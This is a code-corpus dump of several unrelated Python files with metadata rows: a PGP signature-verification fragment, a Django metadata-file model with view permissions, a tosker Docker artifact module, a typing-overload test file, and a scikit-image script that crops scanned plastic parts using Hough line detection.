elif isinstance(f, tuple):
(name, f) = f
downloadedTargetsNames -= {name}
return f
for file2Verify, signature, fingerprint, keyFile in self.files2verify:
file2Verify = preprocessFile(file2Verify)
signature = preprocessFile(signature)
self.pgpBackend.verifyBlob(file2Verify, signature, keyFingerprint=fingerprint, keyFile=keyFile)
if downloadedTargetsNames:
raise Exception("Unverified files:", downloadedTargetsNames)
|
none
| 1
| 2.762673
| 3
|
|
isic/ingest/models/metadata_file.py
|
ImageMarkup/isic
| 0
|
6628541
|
<filename>isic/ingest/models/metadata_file.py
from typing import Optional
from django.contrib.auth.models import User
from django.core.validators import FileExtensionValidator
from django.db import models
from django.db.models.query import QuerySet
import numpy as np
import pandas as pd
from s3_file_field import S3FileField
from isic.core.models import CreationSortedTimeStampedModel
from .cohort import Cohort
class MetadataFile(CreationSortedTimeStampedModel):
    """An uploaded CSV of image metadata attached to a cohort."""
    # User who uploaded the file.
    creator = models.ForeignKey(User, on_delete=models.CASCADE)
    cohort = models.ForeignKey(Cohort, on_delete=models.CASCADE, related_name='metadata_files')
    # Only .csv uploads are accepted.
    blob = S3FileField(validators=[FileExtensionValidator(allowed_extensions=['csv'])])
    # Original file name and byte size, captured at upload time (not editable).
    blob_name = models.CharField(max_length=255, editable=False)
    blob_size = models.PositiveBigIntegerField(editable=False)
    def __str__(self) -> str:
        return self.blob_name
    def to_df(self):
        """Parse the stored CSV into a pandas DataFrame (first row as header)."""
        with self.blob.open() as csv:
            df = pd.read_csv(csv, header=0)
        # pydantic expects None for the absence of a value, not NaN
        df = df.replace({np.nan: None})
        return df
class MetadataFilePermissions:
    """Object-level permission rules for MetadataFile (view only)."""
    model = MetadataFile
    perms = ['view_metadatafile']
    # Maps each permission to the queryset filter that implements it.
    filters = {'view_metadatafile': 'view_metadatafile_list'}
    @staticmethod
    def view_metadatafile_list(
        user_obj: User, qs: Optional[QuerySet[MetadataFile]] = None
    ) -> QuerySet[MetadataFile]:
        """Narrow ``qs`` to the metadata files ``user_obj`` may view.

        Staff see everything; authenticated users see files from cohorts
        whose contributor they own; everyone else sees nothing.
        """
        qs = qs if qs is not None else MetadataFile._default_manager.all()
        if user_obj.is_active and user_obj.is_staff:
            return qs
        elif user_obj.is_active and user_obj.is_authenticated:
            return qs.filter(cohort__contributor__owners__in=[user_obj])
        else:
            return qs.none()
    @staticmethod
    def view_metadatafile(user_obj, obj):
        """True if ``user_obj`` may view the single file ``obj``."""
        # TODO: use .contains in django 4
        return MetadataFilePermissions.view_metadatafile_list(user_obj).filter(pk=obj.pk).exists()
MetadataFile.perms_class = MetadataFilePermissions
|
<filename>isic/ingest/models/metadata_file.py
from typing import Optional
from django.contrib.auth.models import User
from django.core.validators import FileExtensionValidator
from django.db import models
from django.db.models.query import QuerySet
import numpy as np
import pandas as pd
from s3_file_field import S3FileField
from isic.core.models import CreationSortedTimeStampedModel
from .cohort import Cohort
class MetadataFile(CreationSortedTimeStampedModel):
creator = models.ForeignKey(User, on_delete=models.CASCADE)
cohort = models.ForeignKey(Cohort, on_delete=models.CASCADE, related_name='metadata_files')
blob = S3FileField(validators=[FileExtensionValidator(allowed_extensions=['csv'])])
blob_name = models.CharField(max_length=255, editable=False)
blob_size = models.PositiveBigIntegerField(editable=False)
def __str__(self) -> str:
return self.blob_name
def to_df(self):
with self.blob.open() as csv:
df = pd.read_csv(csv, header=0)
# pydantic expects None for the absence of a value, not NaN
df = df.replace({np.nan: None})
return df
class MetadataFilePermissions:
model = MetadataFile
perms = ['view_metadatafile']
filters = {'view_metadatafile': 'view_metadatafile_list'}
@staticmethod
def view_metadatafile_list(
user_obj: User, qs: Optional[QuerySet[MetadataFile]] = None
) -> QuerySet[MetadataFile]:
qs = qs if qs is not None else MetadataFile._default_manager.all()
if user_obj.is_active and user_obj.is_staff:
return qs
elif user_obj.is_active and user_obj.is_authenticated:
return qs.filter(cohort__contributor__owners__in=[user_obj])
else:
return qs.none()
@staticmethod
def view_metadatafile(user_obj, obj):
# TODO: use .contains in django 4
return MetadataFilePermissions.view_metadatafile_list(user_obj).filter(pk=obj.pk).exists()
MetadataFile.perms_class = MetadataFilePermissions
|
en
| 0.567806
|
# pydantic expects None for the absence of a value, not NaN # TODO: use .contains in django 4
| 1.98784
| 2
|
python/testData/paramInfo/TopLevelOverloadsAndImplementation.py
|
truthiswill/intellij-community
| 2
|
6628542
|
from typing import overload
@overload
def foo(value: None) -> None:
pass
@overload
def foo(value: int) -> str:
pass
@overload
def foo(value: str) -> str:
pass
def foo(value):
return None
foo(<arg1>)
|
from typing import overload
@overload
def foo(value: None) -> None:
pass
@overload
def foo(value: int) -> str:
pass
@overload
def foo(value: str) -> str:
pass
def foo(value):
return None
foo(<arg1>)
|
none
| 1
| 2.928868
| 3
|
|
tosker/graph/artifacts.py
|
lucarin91/tosKer
| 7
|
6628543
|
'''
Artifacts module
'''
class Artifact(object):
    """Base class for all deployment artifacts; carries only a display name."""

    def __init__(self, name):
        # Subclasses decide what (if anything) the name means.
        self.name = name

    def __str__(self):
        # Kind tag; every subclass overrides this with its own label.
        return 'Artifact'
#
# def _get_str_name(obj):
# return obj if isinstance(obj, six.string_types) else obj.name
class File(Artifact):
    """Artifact backed by a file on disk, described by its absolute path."""

    def __init__(self, name, abs_path):
        super(File, self).__init__(name)
        # Split at the last '/': everything before is the directory,
        # everything after is the file name (empty dir if no '/').
        self.path, _, self.file = abs_path.rpartition('/')

    @property
    def file_path(self):
        """Full path rebuilt from the directory part and the file name."""
        return '{}/{}'.format(self.path, self.file)

    @property
    def format(self):
        # No format notion for plain files.
        return None

    def __str__(self):
        return 'File'
class DockerImage(Artifact):
    """Artifact referring to a pre-built Docker image ("name[:tag]")."""

    def __init__(self, attr):
        super(DockerImage, self).__init__('')
        # Split on the first ':' only.  The previous two-target
        # `attr.split(':')` raised ValueError whenever attr contained more
        # than one colon; partition keeps the old behaviour for zero or one
        # colon and treats everything after the first colon as the tag.
        name, sep, tag = attr.partition(':')
        self.name = name
        self.tag = tag if sep else 'latest'

    @property
    def format(self):
        """Canonical "name:tag" image reference."""
        return '{}:{}'.format(self.name, self.tag)

    def __str__(self):
        return 'DockerImage'
class DockerImageExecutable(DockerImage):
    """DockerImage variant marking an image that is run as an executable."""
    def __str__(self):
        return 'DockerImageExecutable'
class Dockerfile(Artifact):
    """Artifact describing an image ("name[:tag]") built from a Dockerfile."""

    def __init__(self, attr, dockerfile):
        super(Dockerfile, self).__init__('')
        # Split on the first ':' only.  The previous two-target
        # `attr.split(':')` raised ValueError for names containing more than
        # one colon; partition preserves the old behaviour for zero or one
        # colon and no longer crashes otherwise.
        name, sep, tag = attr.partition(':')
        self.name = name
        self.tag = tag if sep else 'latest'
        # Path (or content reference) of the Dockerfile to build from.
        self.dockerfile = dockerfile

    @property
    def format(self):
        """Canonical "name:tag" image reference."""
        return '{}:{}'.format(self.name, self.tag)

    def __str__(self):
        return 'Dockerfile'
class DockerfileExecutable(Dockerfile):
    """Dockerfile variant marking an image that is run as an executable."""
    def __str__(self):
        return 'DockerfileExecutable'
|
'''
Artifacts module
'''
class Artifact(object):
def __init__(self, name):
self.name = name
def __str__(self):
return 'Artifact'
#
# def _get_str_name(obj):
# return obj if isinstance(obj, six.string_types) else obj.name
class File(Artifact):
def __init__(self, name, abs_path):
super(File, self).__init__(name)
split_path = abs_path.split('/')
self.path = '/'.join(split_path[:-1])
self.file = split_path[-1]
@property
def file_path(self):
return self.path + '/' + self.file
@property
def format(self):
pass
def __str__(self):
return 'File'
class DockerImage(Artifact):
def __init__(self, attr):
super(DockerImage, self).__init__('')
self.name, self.tag = attr.split(':') if ':' in attr \
else (attr, 'latest')
@property
def format(self):
return '{}:{}'.format(self.name, self.tag)
def __str__(self):
return 'DockerImage'
class DockerImageExecutable(DockerImage):
def __str__(self):
return 'DockerImageExecutable'
class Dockerfile(Artifact):
def __init__(self, attr, dockerfile):
super(Dockerfile, self).__init__('')
self.name, self.tag = attr.split(':') if ':' in attr \
else (attr, 'latest')
self.dockerfile = dockerfile
@property
def format(self):
return '{}:{}'.format(self.name, self.tag)
def __str__(self):
return 'Dockerfile'
class DockerfileExecutable(Dockerfile):
def __str__(self):
return 'DockerfileExecutable'
|
en
| 0.153103
|
Artifacts module # # def _get_str_name(obj): # return obj if isinstance(obj, six.string_types) else obj.name
| 2.520082
| 3
|
django_town/social/management/commands/__init__.py
|
uptown/django-town
| 0
|
6628544
|
__author__ = 'uptown'
|
__author__ = 'uptown'
|
none
| 1
| 0.973663
| 1
|
|
student-projects/fall-2020/OST-Imaging-and-Matching-Plastic/mvp/ImportScanCreateImage.py
|
UCBerkeley-SCET/DataX-Berkeley
| 28
|
6628545
|
"""
@author: <NAME>
"""
###########################################################################
## Import the necessary functions
###########################################################################
import sys
sys.path.append('/usr/local/lib/python2.7/site-packages')
import numpy as np
import matplotlib.pyplot as plt
import skimage.io as io
import skimage
from skimage import feature
from skimage.color import rgb2gray
from skimage.transform import rescale
from skimage import transform as tf
import skimage.transform.hough_transform as ht
###########################################################################
## Definition of some helper functions
###########################################################################
#INPUT: two points
#OUTPUT: coefficients A, B, C of line equation that goes through the two input points, A1 * x + B1 * y = C1
def line(p1, p2):
    """Return coefficients (A, B, C) of the line A*x + B*y = C through p1 and p2."""
    x1, y1 = p1[0], p1[1]
    x2, y2 = p2[0], p2[1]
    a = y1 - y2
    b = x2 - x1
    c = x1 * y2 - x2 * y1
    return a, b, -c
# Finds the intersection point (if any) of two lines given by coefficients.
def intersection(L1, L2, x_size, y_size):
    """Intersect two lines given as (A, B, C) coefficient triples.

    Returns (x, y) when the lines cross inside [0, x_size] x [0, y_size],
    (0, 0) when the crossing falls outside those bounds, and False when
    the lines are parallel (zero determinant).
    """
    det = L1[0] * L2[1] - L1[1] * L2[0]
    if det == 0:
        return False
    x = (L1[2] * L2[1] - L1[1] * L2[2]) / det
    y = (L1[0] * L2[2] - L1[2] * L2[0]) / det
    # Out-of-bounds intersections collapse to the (0, 0) sentinel.
    if not (0 <= x <= x_size) or not (0 <= y <= y_size):
        return 0, 0
    return x, y
###########################################################################
## Start of main program
###########################################################################
# We basically want to import the scanner image find the exact location of the
# plastic part on the image. Once we know the location, we want to create a
# new image (600*800) that only contains the plastic part
###########################################################################
if __name__ == "__main__":
#######################################################################
## Preprocess image
#######################################################################
# Import the scanner image, convert the image from color to grayscale
# since it is much easier to work with and remove the border of the image
# (A rgb image consists of 3 layers, one for red green for blue.
# 100mio numbers in our case. A grayscale image has only one layer. Each
# pixel can either be bright (255), black (0) or something in between.)
# Change the path to a scanner image (Sampledata\Scanned_images in our
# shared google folder)
path=r'C:\Users\tobias.grab\switchdrive\Schule\datax\projekt\input\20200916151652_001.jpg'
im_color=io.imread(path)
original=rgb2gray(im_color)
bordersize=0.02;
original=original[int(bordersize*original.shape[0]):int((1-bordersize)*original.shape[0]),
int(bordersize*original.shape[1]):int((1-bordersize)*original.shape[1])]
print("original shape:", original.shape)
print("original dtype:", original.dtype)
# Rescale the image for computational reasons. Scaling both sides by
# factor of five leads to 25 times less numbers to work with
# (about 1.3 million insead of 33 million)
scaling_factor=5
im=rescale(original,1/scaling_factor, multichannel=False)
print("rescaled size", im.shape)
y_size=im.shape[0]
x_size=im.shape[1]
# PREPROCESSING
# Create a binary image and remove the noise from the image (Some white
# spots where the plasic part is) using a morphological opening.
# Simplified a opening replaces the value of each pixel first by the minimum
# value in its neighborhood (Defined by the kernel). In a second step the
# value of each pixel gets replaced by the maximum in its neighborhood.
# That leads to the result, that white spots smaller than the kernel
# will be black after the opening.
im=im>0.9
plt.figure()
plt.imshow(im,vmin=0, vmax=1,cmap="gray")
kernel = np.ones((10,10))==1
im=skimage.morphology.binary_opening(im,kernel)
plt.figure()
plt.imshow(im, vmin=0, vmax=1,cmap="gray")
# Filter the edges (Looking for the edges of the plastic part)
# Finding edges of an image can basically be done by calculating the
# gradient of the image (Using a 2D convolution) since edges are usually
# strong changes in illumination (so have a high gradient)
# The canny edge detector is a more sophisticaed way to do it, but the
# principle is the same
canny_sigma=1
plt.figure()
imedges=feature.canny(im,sigma=canny_sigma)
plt.imshow(imedges)
#######################################################################
## Find the corners of the plastic parts (Intersection of the edge lines)
#######################################################################
# First we have to a representation of the edges, which are in our case
# the four most prominant lines in the image. Since we want to do some
# calculations with it, we need to get formulas for those lines.
# In order to get those formulas, we use a hough transformation
# A line usually gets represented by the equation y=a*x+b, however the
# problem there is that a vertical line can not be represented. A more
# robust representation is a representation by a angle and a distance (from zero)
# With a hough transformation we transform our image into the hough space.
# The hough space is a representation of all possible lines, one dimension
# is the distance, the other the angle. Every point in the hough space
# is a line in the image. The hough algorithm is basically a voting algorithm.
# For every point in the hough space, we calculate corresponding line in
# our original image the line and count the number of points that are
# on that line. The points with the most votes (the max value) in the hough space
# correspond to the most prominant line.
# The same principle can be used for circle detection, square detection and
# so on. You only need to be able to define with hough space with only a few
# variables (e.g. the radius, and the coordinates of the middle point for
# a circle ==> the hough space wouldn't be 2 dimensional anymore)
H,angles,distances = ht.hough_line(imedges)
# The probelm is that the same line can be representet by a distance and thetha
# as well as -distance and -theta... so we set half of the hough space to zero
H[:int(H.shape[0]/2),:int(H.shape[1]/2)]=0
#Find four most dominant points in the hough space, once a dominant point is
#detected, set points near it to zero
d=[]
theta=[]
for i in range(0,4):
(maxr, maxc) = np.unravel_index(np.argmax(H), H.shape)
print(H.dtype)
min_del_dist=maxr-20
if min_del_dist<=0:
min_del_dist=0;
min_del_angle=maxc-5
if min_del_angle<=0:
min_del_angle=0;
H[(min_del_dist):(maxr+20),(min_del_angle):(maxc+5)]=0;
d.append(distances[maxr])
theta.append(angles[maxc])
print(d[i],theta[i])
d=np.array([d])
theta=np.array([theta])
#D and theta are the distance and angle representation of the four most
#prominant lines
########################################################################
## We got a represenation of the lines now, time to plot everything
########################################################################
#Plot of the hough space
fig,(ax0,ax1) = plt.subplots(ncols=2, nrows=1, figsize=(15,8))
ax0.imshow(imedges, cmap="gray")
Himage = ax1.imshow(H,extent=(angles[0],angles[-1],distances[0],distances[-1]),origin="lower",aspect="auto")
ax1.set(xlabel="angle [rad]", ylabel="d [pixels]", title="H: Hough space accumulator");
plt.colorbar(Himage)
ax1.plot(theta, d, "ws", fillstyle="none")
#Plot of the image with the most prominant lines
p0=np.zeros((2,4))
p2=np.zeros((2,4))
for i in range(0,4):
#In order to draw the line, we need two points on it
p1 = np.array([d[0,i]*np.cos(theta[0,i]), d[0,i]*np.sin(theta[0,i])])
linedir = np.array([np.cos(theta[0,i]+np.pi/2), np.sin(theta[0,i]+np.pi/2)])
p0[:,i] = p1 - linedir * 1000
p2[:,i] = p1 + linedir * 1000
# We now draw a line through p0 and p2, without rescaling the axes.
ax0.plot([p0[0],p2[0]],[p0[1],p2[1]], scalex=False, scaley=False)
########################################################################
## We now want find the corners, which are the intersections of the lines
########################################################################
# We first use our two points (which we made for the plot)
# to calculate the a*x+b representation using a helper function
lines=[]
for i in range(0,4):
lines.append(line(p0[:,i].T, p2[:,i].T))
#returns A, B and C of A1 * x + B1 * y = C1
#Since we only have four lines, we can calculate all possible combination of
#intersections. If we have parallel lines, there is no intersection
R=[]
R.append(np.array([intersection(lines[0],lines[1], x_size, y_size)]))
R.append(np.array([intersection(lines[0],lines[2], x_size, y_size)]))
R.append(np.array([intersection(lines[0],lines[3], x_size, y_size)]))
R.append(np.array([intersection(lines[1],lines[2], x_size, y_size)]))
R.append(np.array([intersection(lines[1],lines[3], x_size, y_size)]))
R.append(np.array([intersection(lines[2],lines[3], x_size, y_size)]))
#Delete if no intersection
for i in reversed(range(0,len(R))):
if np.sum(R[i])==0:
del R[i]
#Plot intersection points
for i in range(0,4):
ax0.plot(R[i][0,0],R[i][0,1],"ws", fillstyle="none", scalex=False, scaley=False)
#######################################################################
## We finally use the function transform library from skimage
## in order to cut out and warp the image of the plastic part from our
## original (high resoultion) image using the calculated corner points
##
## The skimage.transform.ProjectiveTransform.estimate and the
## skimage.transform.warp functions are very confusing, so I am just glad
## that it works
#######################################################################
dst_corners=np.squeeze(np.array([R[0],R[1],R[2],R[3]]))
dst_sum=np.array([np.sum(dst_corners,axis=1)]).T
dst_arr=np.concatenate((dst_corners, dst_sum),axis=1)
sortedArr = dst_arr[np.argsort(dst_arr[:, 2])]*scaling_factor
if sortedArr[1,0]<sortedArr[2,0]:
src = np.array([[0, 0], [0, 300*2], [400*2, 0],[400*2, 300*2]])
else:
src = np.array([[0, 0], [400*2, 0], [0, 300*2],[400*2, 300*2]])
dst = sortedArr[:,:2]
tform3 = tf.ProjectiveTransform()
tform3.estimate(src, dst)
######################################################################
## We finally have our plastic part image in the variable "warped",
## so lets plot it in order to check
######################################################################
warped = tf.warp(original, tform3, output_shape=(300*2,400*2))
plt.figure()
plt.imshow(warped,cmap='gray')
# io.imsave(r'C:\Users\tobias.grab\switchdrive\Schule\datax\projekt\test\Testimg1.jpg',warped)
|
"""
@author: <NAME>
"""
###########################################################################
## Import the necessary functions
###########################################################################
import sys
sys.path.append('/usr/local/lib/python2.7/site-packages')
import numpy as np
import matplotlib.pyplot as plt
import skimage.io as io
import skimage
from skimage import feature
from skimage.color import rgb2gray
from skimage.transform import rescale
from skimage import transform as tf
import skimage.transform.hough_transform as ht
###########################################################################
## Definition of some helper functions
###########################################################################
#INPUT: two points
#OUTPUT: coefficients A, B, C of line equation that goes through the two input points, A1 * x + B1 * y = C1
def line(p1, p2):
    """Return coefficients (A, B, C) of the line A*x + B*y = C through p1 and p2."""
    x1, y1 = p1[0], p1[1]
    x2, y2 = p2[0], p2[1]
    # Two-point form rearranged into implicit form; the cross term is negated
    # so the equation reads A*x + B*y = C.
    return (y1 - y2), (x2 - x1), -(x1 * y2 - x2 * y1)
#Finds intersection point (if any) of two lines provided by coefs.
def intersection(L1, L2, x_size, y_size):
    """Return the intersection point (x, y) of two lines.

    Parameters
    ----------
    L1, L2 : tuple
        Lines as (A, B, C) coefficient triples of A*x + B*y = C,
        as produced by ``line``.
    x_size, y_size : int
        Image extents; intersections outside [0, x_size] x [0, y_size]
        are rejected.

    Returns
    -------
    tuple
        (x, y) of the intersection, or (0, 0) when the lines are parallel
        or the intersection lies outside the image. Callers detect the
        "no intersection" case via a zero coordinate sum, so the return
        type is kept consistent across all branches (the previous version
        returned a bare ``False`` for parallel lines).
    """
    # Cramer's rule for the 2x2 linear system.
    D = L1[0] * L2[1] - L1[1] * L2[0]
    if D == 0:
        # Parallel (or identical) lines: no unique intersection.
        return 0, 0
    Dx = L1[2] * L2[1] - L1[1] * L2[2]
    Dy = L1[0] * L2[2] - L1[2] * L2[0]
    x = Dx / D
    y = Dy / D
    if x < 0 or x > x_size or y < 0 or y > y_size:
        # Intersection outside the image area: treat as "no intersection".
        return 0, 0
    return x, y
###########################################################################
## Start of main program
###########################################################################
# We basically want to import the scanner image find the exact location of the
# plastic part on the image. Once we know the location, we want to create a
# new image (600*800) that only contains the plastic part
###########################################################################
if __name__ == "__main__":
    #######################################################################
    ## Preprocess image
    #######################################################################
    # Import the scanner image, convert the image from color to grayscale
    # since it is much easier to work with and remove the border of the image
    # (A rgb image consists of 3 layers, one for red, one for green, one for blue.
    # 100mio numbers in our case. A grayscale image has only one layer. Each
    # pixel can either be bright (255), black (0) or something in between.)
    # Change the path to a scanner image (Sampledata\Scanned_images in our
    # shared google folder)
    path=r'C:\Users\tobias.grab\switchdrive\Schule\datax\projekt\input\20200916151652_001.jpg'
    im_color=io.imread(path)
    original=rgb2gray(im_color)
    # Fraction of each image dimension to crop away on every side
    # (removes the dark scanner border).
    bordersize=0.02;
    original=original[int(bordersize*original.shape[0]):int((1-bordersize)*original.shape[0]),
                      int(bordersize*original.shape[1]):int((1-bordersize)*original.shape[1])]
    print("original shape:", original.shape)
    print("original dtype:", original.dtype)
    # Rescale the image for computational reasons. Scaling both sides by a
    # factor of five leads to 25 times less numbers to work with
    # (about 1.3 million instead of 33 million)
    scaling_factor=5
    # NOTE(review): `multichannel` was removed in scikit-image 0.19 —
    # confirm the pinned scikit-image version still accepts it.
    im=rescale(original,1/scaling_factor, multichannel=False)
    print("rescaled size", im.shape)
    y_size=im.shape[0]
    x_size=im.shape[1]
    # PREPROCESSING
    # Create a binary image and remove the noise from the image (some white
    # spots where the plastic part is) using a morphological opening.
    # Simplified, an opening replaces the value of each pixel first by the
    # minimum value in its neighborhood (defined by the kernel). In a second
    # step the value of each pixel gets replaced by the maximum in its
    # neighborhood. That leads to the result that white spots smaller than
    # the kernel will be black after the opening.
    # Binarize: pixels brighter than 0.9 (float grayscale is in [0, 1]) are
    # presumably the white scanner background — verify with real scans.
    im=im>0.9
    plt.figure()
    plt.imshow(im,vmin=0, vmax=1,cmap="gray")
    kernel = np.ones((10,10))==1
    im=skimage.morphology.binary_opening(im,kernel)
    plt.figure()
    plt.imshow(im, vmin=0, vmax=1,cmap="gray")
    # Filter the edges (looking for the edges of the plastic part).
    # Finding edges of an image can basically be done by calculating the
    # gradient of the image (using a 2D convolution) since edges are usually
    # strong changes in illumination (so have a high gradient).
    # The canny edge detector is a more sophisticated way to do it, but the
    # principle is the same.
    canny_sigma=1
    plt.figure()
    imedges=feature.canny(im,sigma=canny_sigma)
    plt.imshow(imedges)
    #######################################################################
    ## Find the corners of the plastic parts (intersection of the edge lines)
    #######################################################################
    # First we have to find a representation of the edges, which are in our
    # case the four most prominent lines in the image. Since we want to do
    # some calculations with it, we need to get formulas for those lines.
    # In order to get those formulas, we use a hough transformation.
    # A line usually gets represented by the equation y=a*x+b, however the
    # problem there is that a vertical line can not be represented. A more
    # robust representation is by an angle and a distance (from zero).
    # With a hough transformation we transform our image into the hough space.
    # The hough space is a representation of all possible lines, one dimension
    # is the distance, the other the angle. Every point in the hough space
    # is a line in the image. The hough algorithm is basically a voting
    # algorithm. For every point in the hough space, we calculate the
    # corresponding line in our original image and count the number of points
    # that are on that line. The points with the most votes (the max value)
    # in the hough space correspond to the most prominent lines.
    # The same principle can be used for circle detection, square detection
    # and so on. You only need to be able to define the hough space with only
    # a few variables (e.g. the radius and the coordinates of the middle point
    # for a circle ==> the hough space wouldn't be 2 dimensional anymore)
    H,angles,distances = ht.hough_line(imedges)
    # The problem is that the same line can be represented by a distance and
    # theta as well as -distance and -theta... so we set half of the hough
    # space to zero
    H[:int(H.shape[0]/2),:int(H.shape[1]/2)]=0
    # Find the four most dominant points in the hough space; once a dominant
    # point is detected, set points near it to zero so the next argmax finds
    # a genuinely different line instead of a neighbor of the same peak.
    d=[]
    theta=[]
    for i in range(0,4):
        (maxr, maxc) = np.unravel_index(np.argmax(H), H.shape)
        print(H.dtype)
        # Suppression window: +-20 distance bins, +-5 angle bins around the
        # peak (clamped at zero to avoid negative-index wraparound).
        min_del_dist=maxr-20
        if min_del_dist<=0:
            min_del_dist=0;
        min_del_angle=maxc-5
        if min_del_angle<=0:
            min_del_angle=0;
        H[(min_del_dist):(maxr+20),(min_del_angle):(maxc+5)]=0;
        d.append(distances[maxr])
        theta.append(angles[maxc])
        print(d[i],theta[i])
    d=np.array([d])
    theta=np.array([theta])
    # d and theta are the distance and angle representation of the four most
    # prominent lines
    ########################################################################
    ## We got a representation of the lines now, time to plot everything
    ########################################################################
    # Plot of the hough space
    fig,(ax0,ax1) = plt.subplots(ncols=2, nrows=1, figsize=(15,8))
    ax0.imshow(imedges, cmap="gray")
    Himage = ax1.imshow(H,extent=(angles[0],angles[-1],distances[0],distances[-1]),origin="lower",aspect="auto")
    ax1.set(xlabel="angle [rad]", ylabel="d [pixels]", title="H: Hough space accumulator");
    plt.colorbar(Himage)
    ax1.plot(theta, d, "ws", fillstyle="none")
    # Plot of the image with the most prominent lines
    p0=np.zeros((2,4))
    p2=np.zeros((2,4))
    for i in range(0,4):
        # In order to draw the line, we need two points on it: start from the
        # foot point (d*cos(theta), d*sin(theta)) and walk +-1000 px along the
        # line direction (perpendicular to the normal).
        p1 = np.array([d[0,i]*np.cos(theta[0,i]), d[0,i]*np.sin(theta[0,i])])
        linedir = np.array([np.cos(theta[0,i]+np.pi/2), np.sin(theta[0,i]+np.pi/2)])
        p0[:,i] = p1 - linedir * 1000
        p2[:,i] = p1 + linedir * 1000
    # We now draw a line through p0 and p2, without rescaling the axes.
    ax0.plot([p0[0],p2[0]],[p0[1],p2[1]], scalex=False, scaley=False)
    ########################################################################
    ## We now want to find the corners, which are the intersections of the lines
    ########################################################################
    # We first use our two points (which we made for the plot)
    # to calculate the a*x+b representation using a helper function
    lines=[]
    for i in range(0,4):
        lines.append(line(p0[:,i].T, p2[:,i].T))
        # returns A, B and C of A1 * x + B1 * y = C1
    # Since we only have four lines, we can calculate all possible
    # combinations of intersections. If we have parallel lines, there is no
    # intersection
    R=[]
    R.append(np.array([intersection(lines[0],lines[1], x_size, y_size)]))
    R.append(np.array([intersection(lines[0],lines[2], x_size, y_size)]))
    R.append(np.array([intersection(lines[0],lines[3], x_size, y_size)]))
    R.append(np.array([intersection(lines[1],lines[2], x_size, y_size)]))
    R.append(np.array([intersection(lines[1],lines[3], x_size, y_size)]))
    R.append(np.array([intersection(lines[2],lines[3], x_size, y_size)]))
    # Delete if no intersection (the helper encodes "no intersection" as a
    # zero coordinate sum); iterate in reverse so deletion doesn't shift the
    # indices still to be visited.
    for i in reversed(range(0,len(R))):
        if np.sum(R[i])==0:
            del R[i]
    # Plot intersection points (assumes exactly 4 corners survive — TODO
    # confirm; fewer survivors would raise an IndexError here).
    for i in range(0,4):
        ax0.plot(R[i][0,0],R[i][0,1],"ws", fillstyle="none", scalex=False, scaley=False)
    #######################################################################
    ## We finally use the transform library from skimage
    ## in order to cut out and warp the image of the plastic part from our
    ## original (high resolution) image using the calculated corner points
    ##
    ## The skimage.transform.ProjectiveTransform.estimate and the
    ## skimage.transform.warp functions are very confusing, so I am just glad
    ## that it works
    #######################################################################
    dst_corners=np.squeeze(np.array([R[0],R[1],R[2],R[3]]))
    # Sort the corners by coordinate sum (x+y): smallest is the top-left
    # corner, largest the bottom-right; scale back up to full resolution.
    dst_sum=np.array([np.sum(dst_corners,axis=1)]).T
    dst_arr=np.concatenate((dst_corners, dst_sum),axis=1)
    sortedArr = dst_arr[np.argsort(dst_arr[:, 2])]*scaling_factor
    # Choose the source-rectangle corner order matching the part's
    # orientation (which of the two middle corners is further left).
    if sortedArr[1,0]<sortedArr[2,0]:
        src = np.array([[0, 0], [0, 300*2], [400*2, 0],[400*2, 300*2]])
    else:
        src = np.array([[0, 0], [400*2, 0], [0, 300*2],[400*2, 300*2]])
    dst = sortedArr[:,:2]
    tform3 = tf.ProjectiveTransform()
    tform3.estimate(src, dst)
    ######################################################################
    ## We finally have our plastic part image in the variable "warped",
    ## so lets plot it in order to check
    ######################################################################
    warped = tf.warp(original, tform3, output_shape=(300*2,400*2))
    plt.figure()
    plt.imshow(warped,cmap='gray')
    # io.imsave(r'C:\Users\tobias.grab\switchdrive\Schule\datax\projekt\test\Testimg1.jpg',warped)
|
en
| 0.65659
|
@author: <NAME> ########################################################################### ## Import the necessary functions ########################################################################### ########################################################################### ## Definition of some helper functions ########################################################################### #INPUT: two points #OUTPUT: coefficients A, B, C of line equation that goes through the two input points, A1 * x + B1 * y = C1 #Finds intersection point (if any) of two lines provided by coefs. ########################################################################### ## Start of main program ########################################################################### # We basically want to import the scanner image find the exact location of the # plastic part on the image. Once we know the location, we want to create a # new image (600*800) that only contains the plastic part ########################################################################### ####################################################################### ## Preprocess image ####################################################################### # Import the scanner image, convert the image from color to grayscale # since it is much easier to work with and remove the border of the image # (A rgb image consists of 3 layers, one for red green for blue. # 100mio numbers in our case. A grayscale image has only one layer. Each # pixel can either be bright (255), black (0) or something in between.) # Change the path to a scanner image (Sampledata\Scanned_images in our # shared google folder) # Rescale the image for computational reasons. Scaling both sides by # factor of five leads to 25 times less numbers to work with # (about 1.3 million insead of 33 million) # PREPROCESSING # Create a binary image and remove the noise from the image (Some white # spots where the plasic part is) using a morphological opening. 
# Simplified a opening replaces the value of each pixel first by the minimum # value in its neighborhood (Defined by the kernel). In a second step the # value of each pixel gets replaced by the maximum in its neighborhood. # That leads to the result, that white spots smaller than the kernel # will be black after the opening. # Filter the edges (Looking for the edges of the plastic part) # Finding edges of an image can basically be done by calculating the # gradient of the image (Using a 2D convolution) since edges are usually # strong changes in illumination (so have a high gradient) # The canny edge detector is a more sophisticaed way to do it, but the # principle is the same ####################################################################### ## Find the corners of the plastic parts (Intersection of the edge lines) ####################################################################### # First we have to a representation of the edges, which are in our case # the four most prominant lines in the image. Since we want to do some # calculations with it, we need to get formulas for those lines. # In order to get those formulas, we use a hough transformation # A line usually gets represented by the equation y=a*x+b, however the # problem there is that a vertical line can not be represented. A more # robust representation is a representation by a angle and a distance (from zero) # With a hough transformation we transform our image into the hough space. # The hough space is a representation of all possible lines, one dimension # is the distance, the other the angle. Every point in the hough space # is a line in the image. The hough algorithm is basically a voting algorithm. # For every point in the hough space, we calculate corresponding line in # our original image the line and count the number of points that are # on that line. The points with the most votes (the max value) in the hough space # correspond to the most prominant line. 
# The same principle can be used for circle detection, square detection and # so on. You only need to be able to define with hough space with only a few # variables (e.g. the radius, and the coordinates of the middle point for # a circle ==> the hough space wouldn't be 2 dimensional anymore) # The probelm is that the same line can be representet by a distance and thetha # as well as -distance and -theta... so we set half of the hough space to zero #Find four most dominant points in the hough space, once a dominant point is #detected, set points near it to zero #D and theta are the distance and angle representation of the four most #prominant lines ######################################################################## ## We got a represenation of the lines now, time to plot everything ######################################################################## #Plot of the hough space #Plot of the image with the most prominant lines #In order to draw the line, we need two points on it # We now draw a line through p0 and p2, without rescaling the axes. ######################################################################## ## We now want find the corners, which are the intersections of the lines ######################################################################## # We first use our two points (which we made for the plot) # to calculate the a*x+b representation using a helper function 